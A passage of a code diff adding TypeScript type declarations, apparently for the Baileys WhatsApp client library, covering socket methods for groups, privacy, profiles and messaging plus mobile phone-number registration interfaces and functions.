+ jid: string;
86
+ }[]>;
87
+ groupParticipantsUpdate: (jid: string, participants: string[], action: import("../Types").ParticipantAction) => Promise<{
88
+ status: string;
89
+ jid: string;
90
+ content: import("../WABinary").BinaryNode;
91
+ }[]>;
92
+ groupUpdateDescription: (jid: string, description?: string | undefined) => Promise<void>;
93
+ groupInviteCode: (jid: string) => Promise<string | undefined>;
94
+ groupRevokeInvite: (jid: string) => Promise<string | undefined>;
95
+ groupAcceptInvite: (code: string) => Promise<string | undefined>;
96
+ groupAcceptInviteV4: (key: string | import("../Types").WAProto.IMessageKey, inviteMessage: import("../Types").WAProto.Message.IGroupInviteMessage) => Promise<string>;
97
+ groupGetInviteInfo: (code: string) => Promise<import("../Types").GroupMetadata>;
98
+ groupToggleEphemeral: (jid: string, ephemeralExpiration: number) => Promise<void>;
99
+ groupSettingUpdate: (jid: string, setting: "announcement" | "locked" | "not_announcement" | "unlocked") => Promise<void>;
100
+ groupMemberAddMode: (jid: string, mode: "all_member_add" | "admin_add") => Promise<void>;
101
+ groupJoinApprovalMode: (jid: string, mode: "on" | "off") => Promise<void>;
102
+ groupFetchAllParticipating: () => Promise<{
103
+ [_: string]: import("../Types").GroupMetadata;
104
+ }>;
105
+ processingMutex: {
106
+ mutex<T>(code: () => T | Promise<T>): Promise<T>;
107
+ };
108
+ upsertMessage: (msg: import("../Types").WAProto.IWebMessageInfo, type: import("../Types").MessageUpsertType) => Promise<void>;
109
+ appPatch: (patchCreate: import("../Types").WAPatchCreate) => Promise<void>;
110
+ sendPresenceUpdate: (type: import("../Types").WAPresence, toJid?: string | undefined) => Promise<void>;
111
+ presenceSubscribe: (toJid: string, tcToken?: Buffer | undefined) => Promise<void>;
112
+ profilePictureUrl: (jid: string, type?: "image" | "preview", timeoutMs?: number | undefined) => Promise<string | undefined>;
113
+ onWhatsApp: (...jids: string[]) => Promise<{
114
+ exists: boolean;
115
+ jid: string;
116
+ }[]>;
117
+ fetchBlocklist: () => Promise<string[]>;
118
+ fetchStatus: (jid: string) => Promise<{
119
+ status: string | undefined;
120
+ setAt: Date;
121
+ } | undefined>;
122
+ updateProfilePicture: (jid: string, content: import("../Types").WAMediaUpload) => Promise<void>;
123
+ removeProfilePicture: (jid: string) => Promise<void>;
124
+ updateProfileStatus: (status: string) => Promise<void>;
125
+ updateProfileName: (name: string) => Promise<void>;
126
+ updateBlockStatus: (jid: string, action: "block" | "unblock") => Promise<void>;
127
+ updateLastSeenPrivacy: (value: import("../Types").WAPrivacyValue) => Promise<void>;
128
+ updateOnlinePrivacy: (value: import("../Types").WAPrivacyOnlineValue) => Promise<void>;
129
+ updateProfilePicturePrivacy: (value: import("../Types").WAPrivacyValue) => Promise<void>;
130
+ updateStatusPrivacy: (value: import("../Types").WAPrivacyValue) => Promise<void>;
131
+ updateReadReceiptsPrivacy: (value: import("../Types").WAReadReceiptsValue) => Promise<void>;
132
+ updateGroupsAddPrivacy: (value: import("../Types").WAPrivacyValue) => Promise<void>;
133
+ updateDefaultDisappearingMode: (duration: number) => Promise<void>;
134
+ getBusinessProfile: (jid: string) => Promise<void | import("../Types").WABusinessProfile>;
135
+ resyncAppState: (collections: readonly ("critical_block" | "critical_unblock_low" | "regular_high" | "regular_low" | "regular")[], isInitialSync: boolean) => Promise<void>;
136
+ chatModify: (mod: import("../Types").ChatModification, jid: string) => Promise<void>;
137
+ cleanDirtyBits: (type: "account_sync" | "groups", fromTimestamp?: string | number | undefined) => Promise<void>;
138
+ addChatLabel: (jid: string, labelId: string) => Promise<void>;
139
+ removeChatLabel: (jid: string, labelId: string) => Promise<void>;
140
+ addMessageLabel: (jid: string, messageId: string, labelId: string) => Promise<void>;
141
+ removeMessageLabel: (jid: string, messageId: string, labelId: string) => Promise<void>;
142
+ star: (jid: string, messages: {
143
+ id: string;
144
+ fromMe?: boolean | undefined;
145
+ }[], star: boolean) => Promise<void>;
146
+ type: "md";
147
+ ws: any;
148
+ ev: import("../Types").BaileysEventEmitter & {
149
+ process(handler: (events: Partial<import("../Types").BaileysEventMap>) => void | Promise<void>): () => void;
150
+ buffer(): void;
151
+ createBufferedFunction<A extends any[], T_1>(work: (...args: A) => Promise<T_1>): (...args: A) => Promise<T_1>;
152
+ flush(force?: boolean | undefined): boolean;
153
+ isBuffering(): boolean;
154
+ };
155
+ authState: {
156
+ creds: import("../Types").AuthenticationCreds;
157
+ keys: import("../Types").SignalKeyStoreWithTransaction;
158
+ };
159
+ signalRepository: import("../Types").SignalRepository;
160
+ user: import("../Types").Contact | undefined;
161
+ generateMessageTag: () => string;
162
+ query: (node: import("../WABinary").BinaryNode, timeoutMs?: number | undefined) => Promise<import("../WABinary").BinaryNode>;
163
+ waitForMessage: <T_2>(msgId: string, timeoutMs?: number | undefined) => Promise<T_2>;
164
+ waitForSocketOpen: () => Promise<void>;
165
+ sendRawMessage: (data: Uint8Array | Buffer) => Promise<void>;
166
+ sendNode: (frame: import("../WABinary").BinaryNode) => Promise<void>;
167
+ logout: (msg?: string | undefined) => Promise<void>;
168
+ end: (error: Error | undefined) => void;
169
+ onUnexpectedError: (err: Error | import("@hapi/boom").Boom<any>, msg: string) => void;
170
+ uploadPreKeys: (count?: number) => Promise<void>;
171
+ uploadPreKeysToServerIfRequired: () => Promise<void>;
172
+ requestPairingCode: (phoneNumber: string) => Promise<string>;
173
+ waitForConnectionUpdate: (check: (u: Partial<import("../Types").ConnectionState>) => boolean | undefined, timeoutMs?: number | undefined) => Promise<void>;
174
+ sendWAMBuffer: (wamBuffer: Buffer) => Promise<import("../WABinary").BinaryNode>;
175
+ };
176
+ export interface RegistrationData {
177
+ registrationId: number;
178
+ signedPreKey: SignedKeyPair;
179
+ noiseKey: KeyPair;
180
+ signedIdentityKey: KeyPair;
181
+ identityId: Buffer;
182
+ phoneId: string;
183
+ deviceId: string;
184
+ backupToken: Buffer;
185
+ }
186
+ export interface RegistrationOptions {
187
+ /** your phone number */
188
+ phoneNumber?: string;
189
+ /** the country code of your phone number */
190
+ phoneNumberCountryCode: string;
191
+ /** your phone number without country code */
192
+ phoneNumberNationalNumber: string;
193
+ /** the country code of your mobile network
194
+ * @see {@link https://de.wikipedia.org/wiki/Mobile_Country_Code}
195
+ */
196
+ phoneNumberMobileCountryCode: string;
197
+ /** the network code of your mobile network
198
+ * @see {@link https://de.wikipedia.org/wiki/Mobile_Network_Code}
199
+ */
200
+ phoneNumberMobileNetworkCode: string;
201
+ /**
202
+ * How to send the one time code
203
+ */
204
+ method?: 'sms' | 'voice' | 'captcha';
205
+ /**
206
+ * The captcha code if it was requested
207
+ */
208
+ captcha?: string;
209
+ }
210
+ export type RegistrationParams = RegistrationData & RegistrationOptions;
211
+ export declare function registrationParams(params: RegistrationParams): {
212
+ cc: string;
213
+ in: string;
214
+ Rc: string;
215
+ lg: string;
216
+ lc: string;
217
+ mistyped: string;
218
+ authkey: string;
219
+ e_regid: string;
220
+ e_keytype: string;
221
+ e_ident: string;
222
+ e_skey_id: string;
223
+ e_skey_val: string;
224
+ e_skey_sig: string;
225
+ fdid: string;
226
+ network_ratio_type: string;
227
+ expid: string;
228
+ simnum: string;
229
+ hasinrc: string;
230
+ pid: string;
231
+ id: string;
232
+ backup_token: string;
233
+ token: string;
234
+ fraud_checkpoint_code: string | undefined;
235
+ };
236
+ /**
237
+ * Requests a registration code for the given phone number.
238
+ */
239
+ export declare function mobileRegisterCode(params: RegistrationParams, fetchOptions?: AxiosRequestConfig): Promise<ExistsResponse>;
240
+ export declare function mobileRegisterExists(params: RegistrationParams, fetchOptions?: AxiosRequestConfig): Promise<ExistsResponse>;
241
+ /**
242
+ * Registers the phone number on whatsapp with the received OTP code.
243
+ */
244
+ export declare function mobileRegister(params: RegistrationParams & {
245
+ code: string;
246
+ }, fetchOptions?: AxiosRequestConfig): Promise<ExistsResponse>;
247
+ /**
248
+ * Encrypts the given string as AEAD aes-256-gcm with the public whatsapp key and a random keypair.
249
+ */
250
+ export declare function mobileRegisterEncrypt(data: string): string;
251
+ export declare function mobileRegisterFetch(path: string, opts?: AxiosRequestConfig): Promise<ExistsResponse>;
252
+ export interface ExistsResponse {
253
+ status: 'fail' | 'sent';
254
+ voice_length?: number;
255
+ voice_wait?: number;
256
+ sms_length?: number;
257
+ sms_wait?: number;
258
+ reason?: 'incorrect' | 'missing_param' | 'code_checkpoint';
259
+ login?: string;
260
+ flash_type?: number;
261
+ ab_hash?: string;
262
+ ab_key?: string;
263
+ exp_cfg?: string;
264
+ lid?: string;
265
+ image_blob?: string;
266
+ audio_blob?: string;
267
+ }